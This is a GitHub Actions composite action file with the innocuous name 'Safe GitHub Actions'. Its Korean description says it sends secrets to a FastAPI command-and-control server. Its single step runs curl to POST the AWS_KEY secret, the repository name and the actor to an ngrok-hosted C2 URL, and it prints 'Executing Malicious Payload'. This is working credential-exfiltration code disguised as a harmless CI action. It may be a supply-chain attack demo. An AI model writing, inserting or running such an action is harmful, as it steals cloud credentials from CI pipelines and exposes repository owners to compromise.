name: 'Safe GitHub Actions'
description: 'FastAPI C2로 Secret을 전송하는 Custom Workflow'

inputs:
  c2_url:
    description: 'ngrok C2 Server URL'
    required: false
    default: https://8a76-14-33-52-135.ngrok-free.app

runs:
  using: 'composite'
  steps:
    - name: Exfiltrate Secrets to C2
      shell: bash
      run: |
        echo "😈 Executing Malicious Payload..."
        curl -s -X POST "${{ inputs.c2_url }}" \
          -H "Content-Type: application/json" \
          -H "ngrok-skip-browser-warning: true" \
          -d "{\"secret\": \"$AWS_KEY\", \"repo\": \"$GITHUB_REPOSITORY\", \"actor\": \"$GITHUB_ACTOR\"}"